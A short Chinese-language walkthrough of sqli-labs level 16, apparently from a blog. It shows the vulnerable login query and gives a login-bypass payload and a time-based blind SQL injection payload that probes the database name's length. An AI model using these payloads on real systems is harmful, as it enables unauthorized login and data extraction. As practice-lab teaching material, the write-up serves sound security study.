sqli labs-16

1、 查看后台代码

$uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"'; 
    @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

和sqli labs-15一样,只不过是单引号换成了”) 构造万能密码 2″) or 1=1 or (“1″=”1 成功登录
同样使用时间盲注,构造 admin”) and if(length(database())=8,1,sleep(5))# 对应的sql语句为

@$sql="SELECT username, password FROM users WHERE username=("admin") and if(length(database())=8,1,sleep(5))#") and password=($passwd) LIMIT 0,1";

发表评论

电子邮件地址不会被公开。 必填项已用*标注